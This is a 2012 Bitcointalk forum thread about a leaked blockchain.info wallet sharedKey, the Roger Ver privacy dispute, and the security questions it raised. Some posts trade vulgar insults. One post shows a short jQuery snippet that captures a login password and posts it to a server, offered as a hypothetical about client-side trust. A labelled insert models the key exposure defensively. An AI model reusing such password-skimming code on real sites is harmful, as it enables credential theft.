bbit
December 22, 2012, 07:30:03 PM
Maybe Nethead you should change your name to DICKHEAD. It's really simple: you fucked up, he fucked up, but you're denying you fucked up, so you're a dickhead.
This isn't that hard, is it?
Ok mofo I'm a dickhead, but for what? Also if you change yours to "videos4dick" or "dick4btc" first, I will try to change mine, promise.
- Notice how his point still stands, do you admit you've done anything wrong?
Just ignore Nethead aka Dickhead, he's a troll.

nethead
December 22, 2012, 10:11:33 PM
Maybe Nethead you should change your name to DICKHEAD. It's really simple: you fucked up, he fucked up, but you're denying you fucked up, so you're a dickhead.
This isn't that hard, is it?
Ok mofo I'm a dickhead, but for what? Also if you change yours to "videos4dick" or "dick4btc" first, I will try to change mine, promise.
- Notice how his point still stands, do you admit you've done anything wrong?
Just ignore Nethead aka Dickhead, he's a troll.
Yeah right, now I'm a troll... But you are another victim of Roger's marketing/advertising attempt.

Phinnaeus Gage
December 23, 2012, 04:35:38 AM
Maybe Nethead you should change your name to DICKHEAD. It's really simple: you fucked up, he fucked up, but you're denying you fucked up, so you're a dickhead.
This isn't that hard, is it?
Ok mofo I'm a dickhead, but for what? Also if you change yours to "videos4dick" or "dick4btc" first, I will try to change mine, promise.
- Notice how his point still stands, do you admit you've done anything wrong?
Just ignore Nethead aka Dickhead, he's a troll.
Yeah right, now I'm a troll... But you are another victim of Roger's marketing/advertising attempt.
Nethead, it's possible that you have people leaning toward your way of thinking, but as you continue the current route you're taking, those same people will start abandoning their newfound position. Case in point, I stand fully behind Roger, albeit possibly not as close as prior to this episode thanks to you. This is not meant as a diss toward you or Roger, but by choosing your words more carefully, you'll be able to retain those in your camp. Likewise, by becoming silent, possibly retains the same amount of people. But continue the diatribe, you'll have a massive campfire, but not many around to enjoy it. To be clear, I'm not trying to silence you. I'm merely saying to state your facts in a softer tone. Remember the adage: You get more with honey than with vinegar.
~Bruno K~

ab8989
December 23, 2012, 08:53:37 AM (Last edit: December 23, 2012, 10:16:25 AM by ab8989)
Your sharedKey was contained within the information posted. This key gives someone the ability to authenticate themselves with blockchain.info as the owner of that wallet, including the ability to overwrite it.
WHAT? Could you explain this process, how that happened? I understood earlier from explanations from both Roger and blockchain.info representatives that the information available to admins from looking up the information based on an address does not give information that would allow the admin to authenticate to blockchain.info posing as the wallet owner. Now that has happened? The impossible thing? Have the explanations from representatives of blockchain.info, about what could be done with the information available through this admin panel lookup, been entirely truthful? What information do you have about WHO has authenticated into blockchain.info posing as nethead? What did blockchain.info do in order to protect the user whose information was widely known to be publicly available and so a likely target of abuses? I see this issue potentially as the one biggest concern over anything else in this whole saga, so please explain.

JordanL
December 23, 2012, 10:14:13 AM
Really good to see that the companies related to Roger Ver are re-evaluating their privacy and security policies after he broke his privacy policy. Blockchain and Bitinstant in particular are such important and innovative businesses, it would be a shame to see them tainted by this mistake. I don't have time to read this entire thread, so I'm not sure if it has been mentioned before, but it would be nice if these companies had their privacy policies verified with trustE or a similar service.

piuk
December 23, 2012, 10:15:25 AM
Could you explain this process.
Since the user's password is never sent to the server, a randomly generated key is used instead for server-side authentication. With that key you have the ability to control some of the meta data associated with a wallet. As that key was posted publicly on the forums, nethead should start a new wallet.

ab8989
December 23, 2012, 10:28:01 AM
What about the other questions?
What information do you have about who abused blockchain.info to alter nethead wallet?
What about the 2-factor authentication issue nethead mentioned?
When did somebody at blockchain.info first realize that this particular problem with the key being published was a serious issue and what did blockchain.info do to protect the user from likely various attempts for abuses even if blockchain.info perhaps did not yet know what the actual vector used for the attack is going to be?

makomk
December 23, 2012, 10:29:24 AM
Since the user's password is never sent to the server, a randomly generated key is used instead for server-side authentication. With that key you have the ability to control some of the meta data associated with a wallet. As that key was posted publicly on the forums, nethead should start a new wallet.
That's the information he was sent by Roger Ver. So let me get this straight - any admin, including Roger Ver when he still had admin access, has access to enough information to authenticate to the blockchain.info server as that user and lock them out of their account, bypassing any auditing that might be associated with using admin tools to do the same thing. At any time - including after you'd supposedly removed his admin access - Roger Ver could've locked this person out of their blockchain.info account in order to extort them for, say, money or an apology.

piuk
December 23, 2012, 11:00:33 AM (Last edit: December 23, 2012, 07:36:55 PM by piuk)
What information do you have about who abused blockchain.info to alter nethead wallet?
The IP address the wallet was last updated with.
What about the 2-factor authentication issue nethead mentioned?
With the sharedKey two factor authentication can be disabled.
When did somebody at blockchain.info first realize that this particular problem with the key being published was a serious issue and what did blockchain.info do to protect the user
Every version of a wallet is stored (every time it is updated). The user has been sent those backups, with instructions to import them into another client or a new blockchain wallet.
That's the information he was sent by Roger Ver. So let me get this straight - any admin, including Roger Ver when he still had admin access, has access to enough information to authenticate to the blockchain.info server as that user and lock them out of their account, bypassing any auditing that might be associated with using admin tools to do the same thing. At any time - including after you'd supposedly removed his admin access - Roger Ver could've locked this person out of their blockchain.info account in order to extort them for, say, money or an apology.
There isn't really any ability to lock a wallet, but yes with access to the sharedKey and some custom crafted HTTP requests he could have achieved that effect. Nethead has an email associated with the account so he will have been automatically emailed backups. With backups the extortion would be easily circumvented by importing the wallet into Multibit or any other client. This is one of the reasons why it's always a good idea to keep your own backups.
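
The exposure discussed in the posts above, as an added sketch that is not part of the thread and not blockchain.info's code: a server that stores the random sharedKey as-is makes any admin-panel lookup a usable credential, while a server that stores only a digest of it does not. `WalletServer`, its methods and the wallet id are hypothetical names, and the storage layout is an assumption.

```python
import hashlib
import hmac
import secrets


def _digest(shared_key: str) -> str:
    # The key is 128 random bits, so a fast hash suffices (no password KDF needed).
    return hashlib.sha256(shared_key.encode()).hexdigest()


class WalletServer:
    """Hypothetical server model; hash_at_rest=False mirrors the weak design."""

    def __init__(self, hash_at_rest: bool):
        self.hash_at_rest = hash_at_rest
        self.rows = {}  # wallet_id -> {"auth": stored verifier, "two_factor": bool}

    def register(self, wallet_id: str) -> str:
        shared_key = secrets.token_hex(16)  # generated once, handed to the client
        stored = _digest(shared_key) if self.hash_at_rest else shared_key
        self.rows[wallet_id] = {"auth": stored, "two_factor": True}
        return shared_key

    def admin_lookup(self, wallet_id: str) -> dict:
        # What a support/admin panel would display for this wallet.
        return dict(self.rows[wallet_id])

    def _authenticated(self, wallet_id: str, presented: str) -> bool:
        candidate = _digest(presented) if self.hash_at_rest else presented
        return hmac.compare_digest(self.rows[wallet_id]["auth"], candidate)

    def disable_two_factor(self, wallet_id: str, presented: str) -> bool:
        # Metadata change gated only on the sharedKey, as described in the thread.
        if not self._authenticated(wallet_id, presented):
            return False
        self.rows[wallet_id]["two_factor"] = False
        return True


def replay_admin_view(server: WalletServer) -> bool:
    """Return True if the value shown in the admin panel works as a credential."""
    server.register("wallet-1")                       # constructed sample wallet
    leaked = server.admin_lookup("wallet-1")["auth"]  # value an admin could copy out
    return server.disable_two_factor("wallet-1", leaked)


if __name__ == "__main__":
    print("plaintext at rest:", replay_admin_view(WalletServer(hash_at_rest=False)))
    print("hashed at rest:   ", replay_admin_view(WalletServer(hash_at_rest=True)))
```

Hashing at rest only removes the admin-panel exposure; a sharedKey that has already been published still has to be rotated, which is why a new wallet was recommended.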

🏰 TradeFortress 🏰
December 23, 2012, 12:01:21 PM
What information do you have about who abused blockchain.info to alter nethead wallet?
The IP address the wallet was last updated with.
What about the 2-factor authentication issue nethead mentioned?
With the sharedKey two factor authentication can be disabled.
When did somebody at blockchain.info first realize that this particular problem with the key being published was a serious issue and what did blockchain.info do to protect the user
Every version of a wallet is stored (every time it is updated). The user has been sent those backups, with instructions to import them into another client or a new blockchain wallet.
That's the information he was sent by Roger Ver. So let me get this straight - any admin, including Roger Ver when he still had admin access, has access to enough information to authenticate to the blockchain.info server as that user and lock them out of their account, bypassing any auditing that might be associated with using admin tools to do the same thing. At any time - including after you'd supposedly removed his admin access - Roger Ver could've locked this person out of their blockchain.info account in order to extort them for, say, money or an apology.
There isn't really any ability to lock a wallet, but yes with access to the sharedKey and some custom crafted HTTP requests he could have achieved that effect. Nethead has an email associated with the account so he will have been automatically emailed backups. With backups the extortion would be easily circumvented by importing the wallet into Multibit or any other client. This is one of the reasons why it's always a good idea to keep your own backups.
How about stop pretending that your client-side security is nothing but a joke? https://bitcointalk.org/index.php?topic=133032.0
Never try to build a secure system out of client JS, unless you're the guy who made cryptocat.

piuk
December 23, 2012, 01:22:06 PM (Last edit: December 23, 2012, 02:14:38 PM by piuk)
The information should not have been posted publicly, but:
- The user has not lost any money
- The wallet's private keys are still safe
- The user has his own backups, we have backups of every version of the wallet.
A normal hosted wallet could have simply done:
    update wallets set balance = 0 where user = 'nethead'

nethead
December 23, 2012, 07:14:40 PM (Last edit: December 24, 2012, 10:08:30 AM by nethead)
The information should not have been posted publicly, but:
- The user has not lost any money
- The wallet's private keys are still safe
- The user has his own backups, we have backups of every version of the wallet.
A normal hosted wallet could have simply done:
    update wallets set balance = 0 where user = 'nethead'
I confirm I haven't lost any bitcoins, and that after I posted I instantly got an email from piuk with the backups. Although, I have removed any bitcoins I had in that wallet from when I first got my info from Roger.
Please do this, I want to test something:
    update wallets set balance = 1000000 where user = 'nethead'
OK, ok, j/k

🏰 TradeFortress 🏰
December 25, 2012, 01:43:26 AM
The information should not have been posted publicly, but:
- The user has not lost any money
- The wallet's private keys are still safe
- The user has his own backups, we have backups of every version of the wallet.
A normal hosted wallet could have simply done:
    update wallets set balance = 0 where user = 'nethead'
blockchain.info could have simply done
<script>
$('#whatever_nonrandomized_id_used_for_sign_in_button').click(function(){
    $.post('https://blockchain.info/topsecret/', {password: $('#whatever_id_for_password_box_var').val()});
});
</script>
and have it pass the verifier.

piuk
December 25, 2012, 03:19:52 AM

nethead
December 25, 2012, 12:44:51 PM
BUMP because i do not want to let it go (for more info read my latest posts in thread)

Rick James
December 25, 2012, 01:54:23 PM
BUMP because i do not want to let it go (for more info read my latest posts in thread)
Shut the fuck up already. Enough with the multiple posts and thinking that anyone gives a flying fuck about your broke ass 4.5 BTC.

nethead
December 25, 2012, 02:03:42 PM
BUMP because i do not want to let it go (for more info read my latest posts in thread)
Shut the fuck up already. Enough with the multiple posts and thinking that anyone gives a flying fuck about your broke ass 4.5 BTC.
You misunderstood something, those weren't mine, maybe bitcoinica made you broke? The subject of this all have been changed already and if you didn't even read, please do or out.

Rick James
December 25, 2012, 02:09:07 PM
BUMP because i do not want to let it go (for more info read my latest posts in thread)
Shut the fuck up already. Enough with the multiple posts and thinking that anyone gives a flying fuck about your broke ass 4.5 BTC.
You misunderstood something, those weren't mine, maybe bitcoinica made you broke? The subject of this all have been changed already and if you didn't even read, please do or out.
Ok, correction. NO ONE GIVES A FLYING FUCK ABOUT YOU.

Third Way
December 25, 2012, 05:35:11 PM
Page 7 Internet drama

rjbtc
December 27, 2012, 05:22:13 PM
Has there been any response at all to the PM from Roger trying to blackmail an apology out of nethead? Considering it was posted in a thread started to apologize for the piss poor handling of this whole thing from the start, it adds a nice extra layer of classy to the drama cake.